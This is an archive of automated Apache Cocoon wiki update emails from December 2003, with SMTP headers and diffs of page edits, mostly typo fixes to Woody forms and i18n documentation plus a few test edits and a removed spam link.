daedalus.apache.org with SMTP; 10 Dec 2003 14:00:05 -0000 Received: from otsrv1.iic.ugent.be (localhost [161.129.204.104]) by otsrv1.iic.ugent.be (8.11.6/8.11.6) with ESMTP id hBAE05p28881 for <[email protected]>; Wed, 10 Dec 2003 15:00:06 +0100 Date: Wed, 10 Dec 2003 15:00:06 +0100 Message-Id: <[email protected]> From: [email protected] To: [email protected] Subject: [WIKI-UPDATE] CMS CocoonUserGroupLondon WorkingWithLocales Woody Wed Dec 10 15:00:05 2003 X-Spam-Rating: daedalus.apache.org 1.6.2 0/1000/N X-Spam-Rating: minotaur-2.apache.org 1.6.2 0/1000/N Page: http://wiki.cocoondev.org/Wiki.jsp?page=CMS , version: 13 on Wed Dec 10 14:05:46 2003 by 161.129.204.104 - prova Page: http://wiki.cocoondev.org/Wiki.jsp?page=CocoonUserGroupLondon , version: 7 on Wed Dec 10 13:13:41 2003 by JeremyQuinn + [Jeremy Quinn|JeremyQuinn]\\ - Page: http://wiki.cocoondev.org/Wiki.jsp?page=WorkingWithLocales , version: 5 on Wed Dec 10 13:05:17 2003 by JeremyQuinn - * i18n Documentation: [WIKI|I18NTransformer] [Cocoon|http://cocoon.apache.org/2.1/userdocs/transformers/i18n-transformer.html] ? ^^^ + * i18n Documentation: [Wiki|I18NTransformer] or [Cocoon|http://cocoon.apache.org/2.1/userdocs/transformers/i18n-transformer.html] ? ^^^ +++ Page: http://wiki.cocoondev.org/Wiki.jsp?page=Woody , version: 26 on Wed Dec 10 13:15:54 2003 by JeremyQuinn + * [WorkingWithLocales] contains some samples on Locale Usage - From [email protected] Wed Dec 10 15:00:09 2003 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 98523 invoked from network); 10 Dec 2003 15:00:09 -0000 Received: from daedalus.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur-2.apache.org with SMTP; 10 Dec 2003 15:00:09 -0000 Received: (qmail 32107 invoked by uid 500); 10 Dec 2003 15:00:04 -0000 Delivered-To: [email protected] Received: (qmail 32077 invoked by uid 500); 10 Dec 2003 15:00:04 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk list-help: <mailto:[email protected]> list-unsubscribe: <mailto:[email protected]> list-post: <mailto:[email protected]> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 32048 invoked from network); 10 Dec 2003 15:00:03 -0000 Received: from unknown (HELO otsrv1.iic.ugent.be) (161.129.204.104) by daedalus.apache.org with SMTP; 10 Dec 2003 15:00:03 -0000 Received: from otsrv1.iic.ugent.be (localhost [161.129.204.104]) by otsrv1.iic.ugent.be (8.11.6/8.11.6) with ESMTP id hBAF04p28908 for <[email protected]>; Wed, 10 Dec 2003 16:00:04 +0100 Date: Wed, 10 Dec 2003 16:00:04 +0100 Message-Id: <[email protected]> From: [email protected] To: [email protected] Subject: [WIKI-UPDATE] CMS UndefinedPages Wed Dec 10 16:00:04 2003 X-Spam-Rating: daedalus.apache.org 1.6.2 0/1000/N X-Spam-Rating: minotaur-2.apache.org 1.6.2 0/1000/N Page: http://wiki.cocoondev.org/Wiki.jsp?page=CMS , version: 13 on Wed Dec 10 14:05:46 2003 by 161.129.204.104 - prova Page: http://wiki.cocoondev.org/Wiki.jsp?page=UndefinedPages , version: 7 on Wed Dec 10 15:03:15 2003 by 161.129.204.104 + ciao From [email protected] Wed Dec 10 16:00:13 2003 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 40738 invoked from network); 10 Dec 2003 16:00:13 -0000 Received: from daedalus.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur-2.apache.org with SMTP; 10 Dec 2003 16:00:13 -0000 Received: (qmail 6859 invoked by uid 500); 10 Dec 2003 16:00:04 -0000 Delivered-To: [email protected] Received: (qmail 6799 invoked by uid 500); 10 Dec 2003 16:00:03 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk list-help: <mailto:[email protected]> list-unsubscribe: <mailto:[email protected]> list-post: <mailto:[email protected]> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 6744 invoked from network); 10 Dec 2003 16:00:02 -0000 Received: from unknown (HELO otsrv1.iic.ugent.be) (161.129.204.104) by daedalus.apache.org with SMTP; 10 Dec 2003 16:00:02 -0000 Received: from otsrv1.iic.ugent.be (localhost [161.129.204.104]) by otsrv1.iic.ugent.be (8.11.6/8.11.6) with ESMTP id hBAG04p28935 for <[email protected]>; Wed, 10 Dec 2003 17:00:04 +0100 Date: Wed, 10 Dec 2003 17:00:04 +0100 Message-Id: <[email protected]> From: [email protected] To: [email protected] Subject: [WIKI-UPDATE] WorkingWithLocales UndefinedPages Wed Dec 10 17:00:04 2003 X-Spam-Rating: daedalus.apache.org 1.6.2 0/1000/N X-Spam-Rating: minotaur-2.apache.org 1.6.2 0/1000/N Page: http://wiki.cocoondev.org/Wiki.jsp?page=WorkingWithLocales , version: 6 on Wed Dec 10 15:25:46 2003 by AndrewSavory - I have set up two InputModules, {{myapp-defaults}} contains default values for our application, one of which is a fall-back Locale. In the case of Locale, I am not sure if this is absolutely nessecary, but we have other application defaults, so I thought I might as well stick this in. ? -- + I have set up two InputModules, {{myapp-defaults}} contains default values for our application, one of which is a fall-back Locale. In the case of Locale, I am not sure if this is absolutely necessary, but we have other application defaults, so I thought I might as well stick this in. ? ++ - These techniques will all obviously work with other aspects on i18n, like number and currency formatting, text-translations etc. ? ^ + These techniques will all obviously work with other aspects of i18n, like number and currency formatting, text-translations etc. ? ^ Page: http://wiki.cocoondev.org/Wiki.jsp?page=UndefinedPages , version: 7 on Wed Dec 10 15:03:15 2003 by 161.129.204.104 + ciao From [email protected] Wed Dec 10 22:00:13 2003 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 51755 invoked from network); 10 Dec 2003 22:00:13 -0000 Received: from daedalus.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur-2.apache.org with SMTP; 10 Dec 2003 22:00:13 -0000 Received: (qmail 73526 invoked by uid 500); 10 Dec 2003 22:00:00 -0000 Delivered-To: [email protected] Received: (qmail 73483 invoked by uid 500); 10 Dec 2003 22:00:00 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk list-help: <mailto:[email protected]> list-unsubscribe: <mailto:[email protected]> list-post: <mailto:[email protected]> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 73444 invoked from network); 10 Dec 2003 22:00:00 -0000 Received: from unknown (HELO otsrv1.iic.ugent.be) (161.129.204.104) by daedalus.apache.org with SMTP; 10 Dec 2003 22:00:00 -0000 Received: from otsrv1.iic.ugent.be (localhost [161.129.204.104]) by otsrv1.iic.ugent.be (8.11.6/8.11.6) with ESMTP id hBAM04p29083 for <[email protected]>; Wed, 10 Dec 2003 23:00:05 +0100 Date: Wed, 10 Dec 2003 23:00:05 +0100 Message-Id: <[email protected]> From: [email protected] To: [email protected] Subject: [WIKI-UPDATE] Bookmarklets Wed Dec 10 23:00:04 2003 X-Spam-Rating: daedalus.apache.org 1.6.2 0/1000/N X-Spam-Rating: minotaur-2.apache.org 1.6.2 0/1000/N Page: http://wiki.cocoondev.org/Wiki.jsp?page=Bookmarklets , version: 3 on Wed Dec 10 21:53:20 2003 by 161.129.204.104 + + [affairs|http://www.day0.com/catch-a-cheat/] + From [email protected] Wed Dec 10 23:00:14 2003 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 81814 invoked from network); 10 Dec 2003 23:00:13 -0000 Received: from daedalus.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur-2.apache.org with SMTP; 10 Dec 2003 23:00:13 -0000 Received: (qmail 64549 invoked by uid 500); 10 Dec 2003 22:59:59 -0000 Delivered-To: [email protected] Received: (qmail 64524 invoked by uid 500); 10 Dec 2003 22:59:59 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk list-help: <mailto:[email protected]> list-unsubscribe: <mailto:[email protected]> list-post: <mailto:[email protected]> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 64512 invoked from network); 10 Dec 2003 22:59:59 -0000 Received: from unknown (HELO otsrv1.iic.ugent.be) (161.129.204.104) by daedalus.apache.org with SMTP; 10 Dec 2003 22:59:59 -0000 Received: from otsrv1.iic.ugent.be (localhost [161.129.204.104]) by otsrv1.iic.ugent.be (8.11.6/8.11.6) with ESMTP id hBAN04p29110 for <[email protected]>; Thu, 11 Dec 2003 00:00:05 +0100 Date: Thu, 11 Dec 2003 00:00:05 +0100 Message-Id: <[email protected]> From: [email protected] To: [email protected] Subject: [WIKI-UPDATE] YatinShah CocoonUserGroupPrinceton UserGroups Thu Dec 11 00:00:04 2003 X-Spam-Rating: daedalus.apache.org 1.6.2 0/1000/N X-Spam-Rating: minotaur-2.apache.org 1.6.2 0/1000/N Page: http://wiki.cocoondev.org/Wiki.jsp?page=YatinShah , version: 6 on Wed Dec 10 23:08:54 2003 by 161.129.204.104 - For information on myself and my work, visit [my site |http://www.kripa.com] + For information on myself and my work, visit [my site |http://www.kripa.com] or mailto:[email protected] ? ++++++++++++++++++++++++ Page: http://wiki.cocoondev.org/Wiki.jsp?page=CocoonUserGroupPrinceton , version: 3 on Wed Dec 10 23:07:21 2003 by 161.129.204.104 Page: http://wiki.cocoondev.org/Wiki.jsp?page=UserGroups , version: 28 on Wed Dec 10 23:05:55 2003 by 161.129.204.104 + * [CocoonUserGroupPrinceton] - Central New Jersey, USA From [email protected] Thu Dec 11 00:00:18 2003 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 6653 invoked from network); 11 Dec 2003 00:00:18 -0000 Received: from daedalus.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur-2.apache.org with SMTP; 11 Dec 2003 00:00:18 -0000 Received: (qmail 52186 invoked by uid 500); 11 Dec 2003 00:00:04 -0000 Delivered-To: [email protected] Received: (qmail 52056 invoked by uid 500); 11 Dec 2003 00:00:03 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk list-help: <mailto:[email protected]> list-unsubscribe: <mailto:[email protected]> list-post: <mailto:[email protected]> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 52045 invoked from network); 11 Dec 2003 00:00:03 -0000 Received: from unknown (HELO otsrv1.iic.ugent.be) (161.129.204.104) by daedalus.apache.org with SMTP; 11 Dec 2003 00:00:03 -0000 Received: from otsrv1.iic.ugent.be (localhost [161.129.204.104]) by otsrv1.iic.ugent.be (8.11.6/8.11.6) with ESMTP id hBB008p29137 for <[email protected]>; Thu, 11 Dec 2003 01:00:09 +0100 Date: Thu, 11 Dec 2003 01:00:09 +0100 Message-Id: <[email protected]> From: [email protected] To: [email protected] Subject: [WIKI-UPDATE] YatinShah Bookmarklets CocoonUserGroupPrinceton UserGroups Thu Dec 11 01:00:08 2003 X-Spam-Rating: daedalus.apache.org 1.6.2 0/1000/N X-Spam-Rating: minotaur-2.apache.org 1.6.2 0/1000/N Page: http://wiki.cocoondev.org/Wiki.jsp?page=YatinShah , version: 7 on Wed Dec 10 23:13:11 2003 by 161.129.204.104 - For information on myself and my work, visit [my site |http://www.kripa.com] or mailto:[email protected] + For information on myself and my work, visit [my site |http://www.kripa.com] or [mailto:[email protected]] ? + + Page: http://wiki.cocoondev.org/Wiki.jsp?page=Bookmarklets , version: 4 on Wed Dec 10 23:30:23 2003 by DavidCrossley - [affairs|http://www.day0.com/catch-a-cheat/] - Page: http://wiki.cocoondev.org/Wiki.jsp?page=CocoonUserGroupPrinceton , version: 3 on Wed Dec 10 23:07:21 2003 by 161.129.204.104 Page: http://wiki.cocoondev.org/Wiki.jsp?page=UserGroups , version: 28 on Wed Dec 10 23:05:55 2003 by 161.129.204.104 + * [CocoonUserGroupPrinceton] - Central New Jersey, USA From [email protected] Thu Dec 11 02:00:15 2003 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 49745 invoked from network); 11 Dec 2003 02:00:15 -0000 Received: from daedalus.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur-2.apache.org with SMTP; 11 Dec 2003 02:00:15 -0000 Received: (qmail 61135 invoked by uid 500); 11 Dec 2003 01:59:57 -0000 Delivered-To: [email protected] Received: (qmail 61099 invoked by uid 500); 11 Dec 2003 01:59:57 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk list-help: <mailto:[email protected]> list-unsubscribe: <mailto:[email protected]> list-post: <mailto:[email protected]> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 61084 invoked from network); 11 Dec 2003 01:59:56 -0000 Received: from unknown (HELO otsrv1.iic.ugent.be) (161.129.204.104) by daedalus.apache.org with SMTP; 11 Dec 2003 01:59:56 -0000 Received: from otsrv1.iic.ugent.be (localhost [161.129.204.104]) by otsrv1.iic.ugent.be (8.11.6/8.11.6) with ESMTP id hBB204p29187 for <[email protected]>; Thu, 11 Dec 2003 03:00:04 +0100 Date: Thu, 11 Dec 2003 03:00:04 +0100 Message-Id: <[email protected]> From: [email protected] To: [email protected] Subject: [WIKI-UPDATE] HowTos TestingFramework Thu Dec 11 03:00:04 2003 X-Spam-Rating: daedalus.apache.org 1.6.2 0/1000/N X-Spam-Rating: minotaur-2.apache.org 1.6.2 0/1000/N Page: http://wiki.cocoondev.org/Wiki.jsp?page=HowTos , version: 153 on Thu Dec 11 01:33:33 2003 by DavidCrossley + + * __[TestingFramework]__ -- explains the framework for adding JUnit and other tests. Page: http://wiki.cocoondev.org/Wiki.jsp?page=TestingFramework , version: 1 on Thu Dec 11 01:41:06 2003 by DavidCrossley New page created: + The framework for JUnit and other tests is explained at Cocoon doco: + [Testing your Apache Cocoon|http://cocoon.apache.org/2.1/installing/tests.html] + + Various tests already exist: a number of JUnit tests, some Anteater functional tests, and Catalog Entity Resolver tests. Please add more and contribute patches. + + See also the [LenyaUnitTests] - some ideas could be utilised for the core Cocoon tests. + From [email protected] Thu Dec 11 04:00:15 2003 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 97801 invoked from network); 11 Dec 2003 04:00:14 -0000 Received: from daedalus.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur-2.apache.org with SMTP; 11 Dec 2003 04:00:14 -0000 Received: (qmail 55050 invoked by uid 500); 11 Dec 2003 03:59:55 -0000 Delivered-To: [email protected] Received: (qmail 55020 invoked by uid 500); 11 Dec 2003 03:59:55 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk list-help: <mailto:[email protected]> list-unsubscribe: <mailto:[email protected]> list-post: <mailto:[email protected]> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 55009 invoked from network); 11 Dec 2003 03:59:55 -0000 Received: from unknown (HELO otsrv1.iic.ugent.be) (161.129.204.104) by daedalus.apache.org with SMTP; 11 Dec 2003 03:59:55 -0000 Received: from otsrv1.iic.ugent.be (localhost [161.129.204.104]) by otsrv1.iic.ugent.be (8.11.6/8.11.6) with ESMTP id hBB403p29599 for <[email protected]>; Thu, 11 Dec 2003 05:00:04 +0100 Date: Thu, 11 Dec 2003 05:00:04 +0100 Message-Id: <[email protected]> From: [email protected] To: [email protected] Subject: [WIKI-UPDATE] Woody Thu Dec 11 05:00:03 2003 X-Spam-Rating: daedalus.apache.org 1.6.2 0/1000/N X-Spam-Rating: minotaur-2.apache.org 1.6.2 0/1000/N Page: http://wiki.cocoondev.org/Wiki.jsp?page=Woody , version: 27 on Thu Dec 11 03:18:04 2003 by DavidCrossley - !!!Woody: Cocoon Forms - - Woody is introduced starting from Cocoon 2.1. However, it is under very active development and the latest CVS versions might provide many advantages. The Woody samples are part of the "Block Samples", or go directly to http://localhost:8888/samples/woody/ to view them. + The "Cocoon Forms" framework (also known by the nickname Woody) is introduced starting from Cocoon 2.1. However, it is under very active development and the latest CVS versions might provide many advantages. The Woody samples are part of the "Block Samples", or go directly to http://localhost:8888/samples/woody/ to view them. ? +++++++++++++++++++++++++++++++++++++++++++++++++++++++++ + - ** [Datatypes|WoodyDatatypeReference] (includes info on selectionlists & converters) ? ^ + ** [Datatypes|WoodyDatatypeReference] (includes info on selectionlists and converters) ? ^^^ - * [Event handling (& request processing phases)|WoodyEventHandling] ? ^ + * [Event handling (and request processing phases)|WoodyEventHandling] ? ^^^ From [email protected] Thu Dec 11 10:00:18 2003 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 50101 invoked from network); 11 Dec 2003 10:00:17 -0000 Received: from daedalus.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur-2.apache.org with SMTP; 11 Dec 2003 10:00:17 -0000 Received: (qmail 67837 invoked by uid 500); 11 Dec 2003 09:59:51 -0000 Delivered-To: [email protected] Received: (qmail 67813 invoked by uid 500); 11 Dec 2003 09:59:51 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk list-help: <mailto:[email protected]> list-unsubscribe: <mailto:[email protected]> list-post: <mailto:[email protected]> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 67802 invoked from network); 11 Dec 2003 09:59:51 -0000 Received: from unknown (HELO otsrv1.iic.ugent.be) (161.129.204.104) by daedalus.apache.org with SMTP; 11 Dec 2003 09:59:51 -0000 Received: from otsrv1.iic.ugent.be (localhost [161.129.204.104]) by otsrv1.iic.ugent.be (8.11.6/8.11.6) with ESMTP id hBBA03p29752 for <[email protected]>; Thu, 11 Dec 2003 11:00:03 +0100 Date: Thu, 11 Dec 2003 11:00:03 +0100 Message-Id: <[email protected]> From: [email protected] To: [email protected] Subject: [WIKI-UPDATE] LenyaDemo Thu Dec 11 11:00:03 2003 X-Spam-Rating: daedalus.apache.org 1.6.2 0/1000/N X-Spam-Rating: minotaur-2.apache.org 1.6.2 0/1000/N Page: http://wiki.cocoondev.org/Wiki.jsp?page=LenyaDemo , version: 32 on Thu Dec 11 09:42:29 2003 by 161.129.204.104 + + Dies ist ein Test From [email protected] Thu Dec 11 11:00:18 2003 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 79679 invoked from network); 11 Dec 2003 11:00:18 -0000 Received: from daedalus.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur-2.apache.org with SMTP; 11 Dec 2003 11:00:18 -0000 Received: (qmail 22906 invoked by uid 500); 11 Dec 2003 10:59:51 -0000 Delivered-To: [email protected] Received: (qmail 22774 invoked by uid 500); 11 Dec 2003 10:59:50 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk list-help: <mailto:[email protected]> list-unsubscribe: <mailto:[email protected]> list-post: <mailto:[email protected]> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 22763 invoked from network); 11 Dec 2003 10:59:50 -0000 Received: from unknown (HELO otsrv1.iic.ugent.be) (161.129.204.104) by daedalus.apache.org with SMTP; 11 Dec 2003 10:59:50 -0000 Received: from otsrv1.iic.ugent.be (localhost [161.129.204.104]) by otsrv1.iic.ugent.be (8.11.6/8.11.6) with ESMTP id hBBB03p29782 for <[email protected]>; Thu, 11 Dec 2003 12:00:03 +0100 Date: Thu, 11 Dec 2003 12:00:03 +0100 Message-Id: <[email protected]> From: [email protected] To: [email protected] Subject: [WIKI-UPDATE] LenyaDemo Thu Dec 11 12:00:03 2003 X-Spam-Rating: daedalus.apache.org 1.6.2 0/1000/N X-Spam-Rating: minotaur-2.apache.org 1.6.2 0/1000/N Page: http://wiki.cocoondev.org/Wiki.jsp?page=LenyaDemo , version: 33 on Thu Dec 11 10:23:04 2003 by 161.129.204.104 - - Dies ist ein Test From [email protected] Thu Dec 11 13:00:10 2003 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 41631 invoked from network); 11 Dec 2003 13:00:10 -0000 Received: from daedalus.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur-2.apache.org with SMTP; 11 Dec 2003 13:00:10 -0000 Received: (qmail 68981 invoked by uid 500); 11 Dec 2003 13:00:08 -0000 Delivered-To: [email protected] Received: (qmail 68839 invoked by uid 500); 11 Dec 2003 13:00:07 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk list-help: <mailto:[email protected]> list-unsubscribe: <mailto:[email protected]> list-post: <mailto:[email protected]> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 68828 invoked from network); 11 Dec 2003 13:00:07 -0000 Received: from unknown (HELO otsrv1.iic.ugent.be) (161.129.204.104) by daedalus.apache.org with SMTP; 11 Dec 2003 13:00:07 -0000 Received: from otsrv1.iic.ugent.be (localhost [161.129.204.104]) by otsrv1.iic.ugent.be (8.11.6/8.11.6) with ESMTP id hBBD06p29836 for <[email protected]>; Thu, 11 Dec 2003 14:00:07 +0100 Date: Thu, 11 Dec 2003 14:00:07 +0100 Message-Id: <[email protected]> From: [email protected] To: [email protected] Subject: [WIKI-UPDATE] WoodyIntro WebDAVAuthentic Thu Dec 11 14:00:06 2003 X-Spam-Rating: daedalus.apache.org 1.6.2 0/1000/N X-Spam-Rating: minotaur-2.apache.org 1.6.2 0/1000/N Page: http://wiki.cocoondev.org/Wiki.jsp?page=WoodyIntro , version: 10 on Thu Dec 11 12:43:26 2003 by 161.129.204.104 - * When the form is submitted, the controller will let the form instance object process the request, so that all widgets can read their value from the request. Some might generated events, which will be handled by event handlers. Validation of the widget tree is also triggered, whereby all widgets will validate themselves based on validation rules described in the form definition. The controller can afterwards perform application-specific validation logic. ? - + * When the form is submitted, the controller will let the form instance object process the request, so that all widgets can read their value from the request. Some might generate events, which will be handled by event handlers. Validation of the widget tree is also triggered, whereby all widgets will validate themselves based on validation rules described in the form definition. The controller can afterwards perform application-specific validation logic. Page: http://wiki.cocoondev.org/Wiki.jsp?page=WebDAVAuthentic , version: 5 on Thu Dec 11 12:46:05 2003 by StenAkselHeien - Classid="clsid:46987108-BA64-4fd1-A947-1BF7DA938FC0" width="700" height="500"> + Classid="<THE CLASSID: classid depends on downloaded version, see http://www.altova.com/manualDocEditorPlugIn/>" width="700" height="500"> + <!-- obsolete: From version 161.129.204.104 of AUTHENTIC 2004 Browser Edition, licenses are no longer required. + --> - As a last step you need to request a (free) license key from Altova.\\ - Just fill in [this form|http://www.altova.com/support_getserverkey.html] and the license key will be emailed to you.\\ - Put it at the place as indicated in the "file2html.xsl" stylesheet. - From [email protected] Thu Dec 11 14:00:12 2003 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 70974 invoked from network); 11 Dec 2003 14:00:12 -0000 Received: from daedalus.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur-2.apache.org with SMTP; 11 Dec 2003 14:00:12 -0000 Received: (qmail 64554 invoked by uid 500); 11 Dec 2003 14:00:07 -0000 Delivered-To: [email protected] Received: (qmail 64534 invoked by uid 500); 11 Dec 2003 14:00:06 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk list-help: <mailto:[email protected]> list-unsubscribe: <mailto:[email protected]> list-post: <mailto:[email protected]> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 64473 invoked from network); 11 Dec 2003 14:00:06 -0000 Received: from unknown (HELO otsrv1.iic.ugent.be) (161.129.204.104) by daedalus.apache.org with SMTP; 11 Dec 2003 14:00:06 -0000 Received: from otsrv1.iic.ugent.be (localhost [161.129.204.104]) by otsrv1.iic.ugent.be (8.11.6/8.11.6) with ESMTP id hBBE06p29865 for <[email protected]>; Thu, 11 Dec 2003 15:00:06 +0100 Date: Thu, 11 Dec 2003 15:00:06 +0100 Message-Id: <[email protected]> From: [email protected] To: [email protected] Subject: [WIKI-UPDATE] WoodyValidationRuleReference WoodyBinding WoodyTemplateTransformer Thu Dec 11 15:00:06 2003 X-Spam-Rating: daedalus.apache.org 1.6.2 0/1000/N X-Spam-Rating: minotaur-2.apache.org 1.6.2 0/1000/N Page: http://wiki.cocoondev.org/Wiki.jsp?page=WoodyValidationRuleReference , version: 4 on Thu Dec 11 13:50:51 2003 by 161.129.204.104 - Checks the length of strings. This validation rule can take 3 attributes: min, max and exact. You can use either of these three seperately or min and max together. The values of these attributes are expressions. Example: ? ^ + Checks the length of strings. This validation rule can take 3 attributes: min, max and exact. You can use either of these three separately or min and max together. The values of these attributes are expressions. Example: ? ^ - <wd:failmessage>Must be 4 4 characters long!</wd:failmessage> ? -- + <wd:failmessage>Must be 4 characters long!</wd:failmessage> - Checks the numeric range. This validation rule can take 3 attributes: min, max and exact. You can use either of these three seperately or min and max together. The values of these attributes are expressions. Example: ? ^ + Checks the numeric range. This validation rule can take 3 attributes: min, max and exact. You can use either of these three separately or min and max together. The values of these attributes are expressions. Example: ? ^ - Checks that a string matches a regular expression. It requires a "pattern" attributes specifying the regexp. The regular expression library used is Jakarta ORO, see [here|http://jakarta.apache.org/oro/api/org/apache/oro/text/regex/package-summary.html] for some information. Example: ? - + Checks that a string matches a regular expression. It requires a "pattern" attribute specifying the regexp. The regular expression library used is Jakarta ORO, see [here|http://jakarta.apache.org/oro/api/org/apache/oro/text/regex/package-summary.html] for some information. Example: Page: http://wiki.cocoondev.org/Wiki.jsp?page=WoodyBinding , version: 20 on Thu Dec 11 14:07:37 2003 by 161.129.204.104 - xmlns:wb=http://apache.org/cocoon/woody/binding/1.0 + xmlns:wb="http://apache.org/cocoon/woody/binding/1.0" ? + + - the __path__ attributes is the address items in the target object (a Javabean or an XML document). The paths can be arbitrary JXPath expressions. ? ^ + The __path__ attributes is the address items in the target object (a Javabean or an XML document). The paths can be arbitrary JXPath expressions. ? ^ Page: http://wiki.cocoondev.org/Wiki.jsp?page=WoodyTemplateTransformer , version: 7 on Thu Dec 11 13:58:55 2003 by 161.129.204.104 - The WoodyTemplateTransformer (simply "woody transformer" from now on) makes it possible to define the layout for your form without having to write a seperate XSLT for each form. If you prefer to do everything with XSLT, you have also the option of using the WoodyGenerator. In general we recommend to use the woody transformer though. ? ^ + The WoodyTemplateTransformer (simply "woody transformer" from now on) makes it possible to define the layout for your form without having to write a separate XSLT for each form. If you prefer to do everything with XSLT, you have also the option of using the WoodyGenerator. In general we recommend to use the woody transformer though. ? ^ - The wt:repeater-widget element is similar to the wt:widget element but provides special treatement for repeaters. The content of the wt:repeater-widget element will be used as a template to generate each of the rows of the repeater. ? - + The wt:repeater-widget element is similar to the wt:widget element but provides special treatment for repeaters. The content of the wt:repeater-widget element will be used as a template to generate each of the rows of the repeater. - The wt:repeater-widget-label element is used to retrieve the the label of a widget contained by a repeater. It requires two attributes: id (identifying the repeater) and widget-id (identifying the widget in the repeater). ? ---- + The wt:repeater-widget-label element is used to retrieve the label of a widget contained by a repeater. It requires two attributes: id (identifying the repeater) and widget-id (identifying the widget in the repeater). From [email protected] Thu Dec 11 15:00:08 2003 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 14973 invoked from network); 11 Dec 2003 15:00:07 -0000 Received: from daedalus.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur-2.apache.org with SMTP; 11 Dec 2003 15:00:07 -0000 Received: (qmail 86302 invoked by uid 500); 11 Dec 2003 15:00:03 -0000 Delivered-To: [email protected] Received: (qmail 86160 invoked by uid 500); 11 Dec 2003 15:00:02 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk list-help: <mailto:[email protected]> list-unsubscribe: <mailto:[email protected]> list-post: <mailto:[email protected]> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 86143 invoked from network); 11 Dec 2003 15:00:02 -0000 Received: from unknown (HELO otsrv1.iic.ugent.be) (161.129.204.104) by daedalus.apache.org with SMTP; 11 Dec 2003 15:00:02 -0000 Received: from otsrv1.iic.ugent.be (localhost [161.129.204.104]) by otsrv1.iic.ugent.be (8.11.6/8.11.6) with ESMTP id hBBF03p29901 for <[email protected]>; Thu, 11 Dec 2003 16:00:03 +0100 Date: Thu, 11 Dec 2003 16:00:03 +0100 Message-Id: <[email protected]> From: [email protected] To: [email protected] Subject: [WIKI-UPDATE] WoodyBinding Thu Dec 11 16:00:03 2003 X-Spam-Rating: daedalus.apache.org 1.6.2 0/1000/N X-Spam-Rating: minotaur-2.apache.org 1.6.2 0/1000/N Page: http://wiki.cocoondev.org/Wiki.jsp?page=WoodyBinding , version: 21 on Thu Dec 11 14:23:35 2003 by 161.129.204.104 - The __id__ attribute identify the [widget|WoodyWidgetReference]. ? ^ + The __id__ attribute identifies the [widget|WoodyWidgetReference]. ? ^^^ - The __path__ attributes is the address items in the target object (a Javabean or an XML document). The paths can be arbitrary JXPath expressions. ? - + The __path__ attribute is the address of the items in the target object (a Javabean or an XML document). The paths can be arbitrary JXPath expressions. ? +++++++ From [email protected] Thu Dec 11 17:00:34 2003 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 44765 invoked from network); 11 Dec 2003 17:00:33 -0000 Received: from daedalus.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur-2.apache.org with SMTP; 11 Dec 2003 17:00:33 -0000 Received: (qmail 11675 invoked by uid 500); 11 Dec 2003 17:00:02 -0000 Delivered-To: [email protected] Received: (qmail 11629 invoked by uid 500); 11 Dec 2003 17:00:02 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk list-help: <mailto:[email protected]> list-unsubscribe: <mailto:[email protected]> list-post: <mailto:[email protected]> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 11558 invoked from network); 11 Dec 2003 17:00:01 -0000 Received: from unknown (HELO otsrv1.iic.ugent.be) (161.129.204.104) by daedalus.apache.org with SMTP; 11 Dec 2003 17:00:01 -0000 Received: from otsrv1.iic.ugent.be (localhost [161.129.204.104]) by otsrv1.iic.ugent.be (8.11.6/8.11.6) with ESMTP id hBBH03p29954 for <[email protected]>; Thu, 11 Dec 2003 18:00:03 +0100 Date: Thu, 11 Dec 2003 18:00:03 +0100 Message-Id: <[email protected]> From: [email protected] To: [email protected] Subject: [WIKI-UPDATE] 